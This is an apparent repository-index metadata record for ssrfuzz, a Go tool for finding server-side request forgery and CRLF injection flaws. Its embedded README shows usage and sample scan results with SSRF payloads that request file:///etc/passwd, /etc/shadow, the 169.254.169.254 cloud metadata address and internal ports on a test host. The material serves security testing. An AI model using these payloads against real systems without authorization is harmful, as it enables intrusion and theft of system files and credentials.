{"id":13842409,"url":"https://github.com/ryandamour/ssrfuzz","last_synced_at":"2026-02-20T15:30:40.005Z","repository":{"id":40519498,"uuid":"329139145","full_name":"ryandamour/ssrfuzz","owner":"ryandamour","description":"SSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities","archived":false,"fork":false,"pushed_at":"2021-03-02T08:14:49.000Z","size":52,"stargazers_count":183,"open_issues_count":4,"forks_count":20,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-07-11T15:55:29.123Z","etag":null,"topics":["bugbounty","security","ssrf"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ryandamour.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-01-12T23:26:41.000Z","updated_at":"2025-05-29T03:29:21.000Z","dependencies_parsed_at":"2022-08-04T02:30:25.868Z","dependency_job_id":null,"html_url":"https://github.com/ryandamour/ssrfuzz","commit_stats":null,"previous_names":[],"tags_count":7,"template":false,"template_full_name":null,"purl":"pkg:github/ryandamour/ssrfuzz","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryandamour%2Fssrfuzz","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryandamour%2Fssrfuzz/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryandamour%2Fssrfuzz/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryandamour%2Fssrfuzz/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ryandamour","download_url":"https://codeload.github.com/ryandamour/ssrfuzz/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryandamour%2Fssrfuzz/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29655290,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-20T09:27:29.698Z","status":"ssl_error","status_checked_at":"2026-02-20T09:26:12.373Z","response_time":59,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","security","ssrf"],"created_at":"2024-08-04T17:01:33.961Z","updated_at":"2026-02-20T15:30:39.971Z","avatar_url":"https://github.com/ryandamour.png","language":"Go","funding_links":[],"categories":["漏洞扫描","Go"],"sub_categories":[],"readme":"# SSRFUZZ\n\nSSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities\n\n## Why?\n- I wanted to write a tool in Golang for concurrency\n- I wanted to fuzz parameters for SSRF vulnerablities, as well as fuzz _both_ paths and parameters for CRLF injections\n- I was inspired by Orange's work for chaining these types of vulnerabilities together (https://blog.orange.tw)\n\n## Installation\n\nRun the following command to intsall\n\n```bash\ngo get -u github.com/ryandamour/ssrfuzz\n```\n\n## Usage\n\n```go\n\n  ██████   ██████  ██▀███    █████▒█    ██ ▒███████▒▒███████▒\n▒██    ▒ ▒██    ▒ ▓██ ▒ ██▒▓██   ▒ ██  ▓██▒▒ ▒ ▒ ▄▀░▒ ▒ ▒ ▄▀░\n░ ▓██▄   ░ ▓██▄   ▓██ ░▄█ ▒▒████ ░▓██  ▒██░░ ▒ ▄▀▒░ ░ ▒ ▄▀▒░ \n  ▒   ██▒  ▒   ██▒▒██▀▀█▄  ░▓█▒  ░▓▓█  ░██░  ▄▀▒   ░  ▄▀▒   ░\n▒██████▒▒▒██████▒▒░██▓ ▒██▒░▒█░   ▒▒█████▓ ▒███████▒▒███████▒\n▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░ ▒▓ ░▒▓░ ▒ ░   ░▒▓▒ ▒ ▒ ░▒▒ ▓░▒░▒░▒▒ ▓░▒░▒\n░ ░▒  ░ ░░ ░▒  ░ ░  ░▒ ░ ▒░ ░     ░░▒░ ░ ░ ░░▒ ▒ ░ ▒░░▒ ▒ ░ ▒\n░  ░  ░  ░  ░  ░    ░░   ░  ░ ░    ░░░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░\n      ░        ░     ░               ░       ░ ░      ░ ░    \n                                           ░        ░        \n\n===============================================================\nSSRFUZZ 1.2\nby Ryan D'Amour @ryandamour \n===============================================================A scanner for all your SSRF Fuzzing needs\n\nUsage:\n  ssrfuzz scan [flags]\n\nFlags:\n  -b, --call-back string       Add callback for SSRF fuzzing (ie: https://github.com/ropnop/serverless_toolkit/tree/master/ssrf_slack)\n  -c, --cookie string          Cookie to use for requests\n      --crlf-path              Add CRLF payloads to all available paths (ie: site.com/%0Atest.php)\n      --delay int              The time each threads waits between requests in milliseconds (default 100)\n  -d, --domains string         Location of domains with parameters to scan\n  -h, --help                   help for scan\n  -x, --http-method string     HTTP Method - GET or POST (default \"GET\")\n  -o, --output string          Location to save results\n      --skip-crlf              Skip CRLF fuzzing\n      --skip-network           Skip network fuzzing\n      --skip-scheme            Skip scheme fuzzing\n  -s, --slack-webhook string   Slack webhook to send findings to a channel\n  -t, --threads int            Number of threads to run ssrfuzz on (default 50)\n      --timeout int            The amount of time needed to close a connection that could be hung (default 10)\n  -u, --user-agent string      User agent for requests (default \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\")\n  -v, --verbose                verbose output\n```\n\n```bash\nUsage: \necho \"http://url_to_fuzz\" | ssrfuzz scan\ncat file_of_domains.txt | ssrfuzz scan\nssrfuzz scan -d file_of_domains.txt\n```\n\n```go\n* Scanning http and scheme payloads w/ crlf:\n\necho \"http://192.168.1.10/test.php?u=\" | go run main.go scan\n \n[!] Scheme payload match:\n* http://192.168.1.10/test.php?u=file://etc/passwd 200\n\n[!] Interesting payloads found\n* http://192.168.1.10/test.php?u=http://127.1.0.0:80 200\n* http://192.168.1.10/test.php?u=http://127.1.0.0:8080 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:443 500\n* http://192.168.1.10test.php?u=http://127.1.0.0:22 500\n* http://192.168.1.10/test.ph?u=http://127.1.0.0:25 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:445 500\n\n[!] Interesting payloads found\n* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200\n* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200\n* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500\n```\n\n```go\n* Scanning only http payloads w/ crlf:\n\necho \"http://192.168.1.10/test.php?u=\" | go run main.go scan --skip-scheme\n\n[!] Interesting payloads found\n* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200\n* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200\n* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:443%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:443%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:25%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:25%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:22%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:22%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:445%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:445%23%OA 500\n```\n\n```go\n* Scanning only http payloads w/o crlf:\n\necho \"http://192.168.1.10/test.php?u=\" | go run main.go scan --skip-scheme --skip-crlf\n\n[!] Interesting payloads found\n* http://192.168.1.10/test.php?u=http://127.1.0.0:80 200\n* http://192.168.1.10/test.php?u=http://127.1.0.0:8080 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:443 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:22 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:25 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:445 500\n```\n\n```go\n* Scanning only scheme payloads w/o crlf:\n\necho \"http://192.168.1.10/test.php?u=\" | go run main.go scan --skip-network --skip-crlf\n\n[!] Interesting payloads found\n* http://192.168.1.10/test.php?u=file:///etc/passwd 200\n* http://192.168.1.10/test.php?u=file:///etc/shadow 500\n* http://192.168.1.10/test.php?u=file://169.254.169.254/ 500\n```\n\n\n## Contributing\nPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.\n\nPlease make sure to update tests as appropriate.\n\n## License\n[MIT](https://choosealicense.com/licenses/mit/)\n\n## Sponsored By\n[Stage2Security](https://www.stage2sec.com)\n![alt text](https://miro.medium.com/max/168/1*Pzr_iwx12ycGpGg0K0Yauw.png)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fryandamour%2Fssrfuzz","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fryandamour%2Fssrfuzz","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fryandamour%2Fssrfuzz/lists"}